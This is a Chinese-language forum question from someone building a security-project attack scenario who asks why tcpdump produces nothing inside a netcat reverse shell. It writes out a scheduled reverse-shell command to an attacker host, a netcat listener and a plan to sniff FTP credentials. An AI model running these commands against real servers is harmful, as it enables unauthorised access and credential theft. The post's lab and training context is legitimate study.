shell - tcpdump 不能使用带有 netcat 的反向 shell
问题描述
我正在做网络安全项目,我必须创建一些攻击场景。
所以我们有两个设备。FTP 服务器和黑客的计算机。我在 FTP 服务器上创建了一个脚本,它每分钟运行一次并执行命令(nc hacker.ip -e /bin/sh)。
Hacker 的计算机监听端口 21 (netcat -lvp 21) 上的任何连接,因此我从 FTP 服务器获得了一个 root shell。
场景的想法是使用 tcpdump 捕获一些 FTP 凭据,但是有一个问题。当我在反向 shell 中运行 tcpdump 时,会发生任何事情。我仍然可以运行 ls、ps 等命令......就像 tcpdump 无法识别一样。
我试图在真正的 FTP shell 上运行它并且它可以工作,但我没有成功在互联网上找到任何东西来理解它为什么不起作用。
如果有人有想法,我很乐意了解我该怎么做。
祝你今天过得愉快!